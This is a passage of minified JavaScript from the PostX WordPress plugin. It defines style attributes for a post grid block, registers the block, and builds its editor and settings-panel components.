}"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"10"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { margin-bottom: {{imgSpacing}}px !important; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:10,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:26,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:10,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt{ padding: {{excerptPadding}}; }"}]},contentWidth:{type:"object",default:{lg:"85"},style:[{depends:[{key:"layout",condition:"!=",value:["layout1","layout2"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout4 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content { max-width:{{contentWidth}}% !important;  }"}]},contentShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"layout",condition:"!=",value:["layout1","layout2"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap, \n        {{ULTP}} .ultp-layout4 .ultp-block-content-wrap, \n        {{ULTP}} .ultp-layout5 .ultp-block-content-wrap { overflow: visible;  } \n        {{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout4  .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content"}]},contentRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"layout",condition:"!=",value:["layout1","layout2"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout4 .ultp-block-content-wrap .ultp-block-content, \n        {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content { border-radius:{{contentRadius}}; }"}]},contentAlign:{type:"string",default:"center",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;} \n          {{ULTP}} .ultp-block-image img, \n          {{ULTP}} .ultp-block-image { margin-right: auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;} \n          {{ULTP}} .ultp-block-image img, \n          {{ULTP}} .ultp-block-image { margin: 0 auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;} \n          {{ULTP}} .ultp-block-image img, \n          {{ULTP}} .ultp-block-image { margin-left: auto; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse;justify-content: flex-end; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},innerBgColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"!=",value:"layout1"},{key:"layout",condition:"!=",value:"layout2"}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-wrap .ultp-block-content,\n          {{ULTP}} .ultp-layout4 .ultp-block-content-wrap .ultp-block-content, \n          {{ULTP}} .ultp-layout5 .ultp-block-content-wrap .ultp-block-content { background:{{innerBgColor}}; }"}]},contentWrapInnerPadding:{type:"object",default:{lg:{unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content, \n          {{ULTP}} .ultp-layout2 .ultp-block-content, \n          {{ULTP}} .ultp-layout3 .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { border-bottom-width: {{septSize}}px; }"}]},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { \n              position: relative; display: block; margin: auto 0 0 0; height: auto;\n          }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; } \n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:"0"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},enhancedPaginationEnabled:{type:"boolean",default:!0},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],[],[{key:"vidIconPosition",default:"center"},{key:"iconSize",default:{lg:"80",sm:"50",xs:"50",unit:"px"}},{key:"catLineColor",default:"var(--postx_preset_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catBgHoverColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)"}},{key:"catSacing",default:{lg:{top:10,bottom:5,unit:"px"},unit:"px"}},{key:"readMoreColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:""}},{key:"readMorePadding",default:{lg:{top:"2",bottom:"2",left:"10",right:"8",unit:"px"}}}]),...(0,i.b)({}),V4_1_0_CompCheck:a.O}},5715:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(13452),r=l(22850),s=l(41850);const{__}=wp.i18n,{registerBlockType:p,createBlock:c}=wp.blocks,u=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-1/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-1.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Post Grid in the classic style.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:u},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid1.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-1")]},edit:n.Z,save:()=>null})},67163:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(93128);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useRef:E,useState:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=E(null),[l,M]=S(w.Ti),[A,H]=S(null),{setAttributes:N,name:j,clientId:Z,attributes:O,context:R,className:D,isSelected:z,attributes:{blockId:F,currentPostId:W,readMoreIcon:V,excerptLimit:G,metaStyle:q,metaShow:$,catShow:K,overlayContentPosition:J,metaSeparator:Y,titleShow:X,catStyle:Q,catPosition:ee,titlePosition:te,excerptShow:le,imgCrop:oe,imgAnimation:ae,imgOverlayType:ie,imgOverlay:ne,metaList:re,readMore:se,readMoreText:pe,metaPosition:ce,showFullExcerpt:ue,showImage:de,titleAnimation:me,customCatColor:ge,onlyCatColor:ye,contentTag:be,titleTag:ve,showSeoMeta:he,titleLength:fe,metaMinText:ke,metaAuthorPrefix:we,titleStyle:xe,metaDateFormat:Te,authorLink:_e,fallbackEnable:Ce,vidIconEnable:Ee,notFoundMessage:Se,dcEnabled:Pe,dcFields:Le,previewImg:Ie,advanceId:Be,paginationShow:Ue,paginationAjax:Me,headingShow:Ae,filterShow:He,paginationType:Ne,navPosition:je,paginationNav:Ze,loadMoreText:Oe,paginationText:Re,V4_1_0_CompCheck:{runComp:De}}}=e;function ze(e){M({...l,selectedDC:e})}function Fe(){M({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function We(e){M({...l,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e)}function Ve(e){M((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function Ge(){l.error&&M({...l,error:!1}),l.loading||M({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(O)}).then((e=>{M({...l,postsList:e,loading:!1})})).catch((e=>{M({...l,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),Ge()}),[]),C((()=>{const t=Z.substr(0,6),l=B(U(Z));(0,a.qi)(N,l,W,Z),(0,v.h)(e),F?F&&F!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||N({blockId:t})):(N({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&N({queryType:"archiveBuilder"}))}),[Z]),C((()=>{const e=t.current;(0,h.o6)()&&0===O.dcFields.length&&N({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,O)&&(Ge(),t.current=O),e.isSelected!==z&&z&&(0,w.gT)(We,Ve)):t.current=O}),[O]);const qe={settingTab:A,setSettingTab:H,setAttributes:N,name:j,attributes:O,setSection:We,section:l.section,clientId:Z,context:R,setSelectedDc:ze,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){ze(e),Ve("dc_group")}};let $e;if(F&&($e=(0,y.Kh)(O,"ultimate-post/post-grid-2",F,(0,a.k0)())),Ie&&!z)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Ie});C((()=>{z&&O.previewImg&&N({previewImg:""})}),[e?.isSelected]);const Ke=_({...Be&&{id:Be},className:`ultp-block-${F} ${D}`,onClick:e=>{e.stopPropagation(),We("general"),Ve("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:qe,selected:l.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:qe})),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["wrapOuterPadding","wrapMargin","spaceSep"]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[De?"exclude":"dep"]:a.N2}],store:qe}),(0,o.createElement)("div",Ke,$e&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:$e}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ae||He||Ue)&&(0,o.createElement)(r.Z,{attributes:O,setAttributes:N,onClick:()=>{We("heading"),Ve("heading")},setSection:We,setToolbarSettings:Ve}),function(){const e=`${be}`,t=(e,t)=>(0,h.o6)()&&Pe&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Le,settingsOnClick:(e,t)=>{e?.stopPropagation(),Ve(t)},selectedDC:l.selectedDC,setSelectedDc:ze,setAttributes:N,dcFields:Le});return l.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):l.postsList.length>0?(0,o.createElement)("div",{className:"ultp-block-items-wrap ultp-block-row"},l.postsList.map(((l,a)=>{const r=JSON.parse(re.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:a,className:`ultp-block-item post-id-${l.ID} ${me?" ultp-animation-"+me:""}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap ultp-block-content-overlay"},(0,o.createElement)(s.E_,{catPosition:ee,imgOverlay:ne,imgOverlayType:ie,imgAnimation:ae,post:l,fallbackEnable:Ce,vidIconEnable:Ee,showImage:de,imgCrop:oe,onClick:()=>{We("image"),Ve("image")},Category:"aboveTitle"!=ee?(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:K,catStyle:Q,catPosition:ee,customCatColor:ge,onlyCatColor:ye,onClick:e=>{We("taxonomy-/-category"),Ve("cat")}})):null}),Ee&&l.has_video&&(0,o.createElement)(s.nk,{onClick:e=>{We("video"),Ve("video")}}),(0,o.createElement)("div",{className:`ultp-block-content ultp-block-content-${J}`},(0,o.createElement)("div",{className:"ultp-block-content-inner"},t(7,l.ID),"aboveTitle"==ee&&(0,o.createElement)(i.Z,{post:l,catShow:K,catStyle:Q,catPosition:ee,customCatColor:ge,onlyCatColor:ye,onClick:e=>{We("taxonomy-/-category"),Ve("cat")}}),t(6,l.ID),l.title&&X&&1==te&&(0,o.createElement)(g.Z,{title:l.title,headingTag:ve,titleLength:fe,titleStyle:xe,onClick:e=>{We("title"),Ve("title")}}),t(5,l.ID),$&&"top"==ce&&(0,o.createElement)(c.Z,{meta:r,post:l,metaSeparator:Y,metaStyle:q,metaMinText:ke,metaAuthorPrefix:we,metaDateFormat:Te,authorLink:_e,onClick:e=>{We("meta"),Ve("meta")}}),t(4,l.ID),l.title&&X&&0==te&&(0,o.createElement)(g.Z,{title:l.title,headingTag:ve,titleLength:fe,titleStyle:xe,onClick:e=>{We("title"),Ve("title")}}),t(3,l.ID),le&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:G,showFullExcerpt:ue,showSeoMeta:he,onClick:e=>{We("excerpt"),Ve("excerpt")}}),t(2,l.ID),se&&(0,o.createElement)(m.Z,{readMoreText:pe,readMoreIcon:V,titleLabel:l.title,onClick:()=>{We("read-more"),Ve("read-more")}}),t(1,l.ID),$&&"bottom"==ce&&(0,o.createElement)(c.Z,{meta:r,post:l,metaSeparator:Y,metaStyle:q,metaMinText:ke,metaAuthorPrefix:we,metaDateFormat:Te,authorLink:_e,onClick:e=>{We("meta"),Ve("meta")}}),t(0,l.ID),(0,h.o6)()&&Pe&&(0,o.createElement)(f.Z,{dcFields:Le,setAttributes:N,startOnboarding:Fe,overlayMode:!0,inverseColor:!0})))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Se})}(),Ue&&"loadMore"==Ne&&(0,o.createElement)(p.Z,{loadMoreText:Oe,onClick:e=>{We("pagination"),Ve("pagination")}}),Ue&&"navigation"==Ne&&"topRight"!=je&&(0,o.createElement)(u.Z,{onClick:()=>{We("pagination"),Ve("pagination")}}),Ue&&"pagination"==Ne&&(0,o.createElement)(d.Z,{paginationNav:Ze,paginationAjax:Me,paginationText:Re,onClick:e=>{We("pagination"),Ve("pagination")}}))))}},93128:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(87025),d=l(92637),m=l(43581);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{queryType:l,advFilterEnable:n,advPaginationEnable:r,V4_1_0_CompCheck:{runComp:s}}=t.attributes,{context:p,section:y,settingTab:b,setSettingTab:v}=t;return g((()=>{(0,u.CH)(p,n,t,r)}),[n,r,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(m.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6830",store:t}),(0,o.createElement)(d.Sections,{settingTab:b,setSettingTab:v},(0,o.createElement)(d.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(d.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{initialOpen:y.general,store:t,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columnGridGap"],include:[{position:2,data:{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap","ultimate-post")}},{position:3,data:{type:"range",key:"overlayHeight",min:0,max:700,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:y.title}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:y.image,include:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgWidth","imageScale","imgHeight","imgMargin","imgCropSmall"],hrIdx:[{tab:"settings",hr:[2,10]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,initialOpen:y.meta,depend:"metaShow",exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:y["taxonomy-/-category"],store:t,depend:"catShow",hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{depend:"excerptShow",isTab:!0,initialOpen:y.excerpt,store:t,hrIdx:[3,6]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:y["read-more"],depend:"readMore"}),(0,o.createElement)(a.rS,{initialOpen:y.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.fm,{store:t,include:a.aG,exclude:["overlaySmallHeight"]}),!s&&(0,o.createElement)(i.Z,{open:y.filter||y.pagination||y.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:y.heading,depend:"headingShow"}),"posts"!=l&&"customPosts"!=l&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:y.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:y.pagination,depend:"paginationShow",hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(d.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:c,titleShow:u,catPosition:d,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,u&&0==m,i&&"top"==b,u&&1==m,f&&"aboveTitle"==d];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading 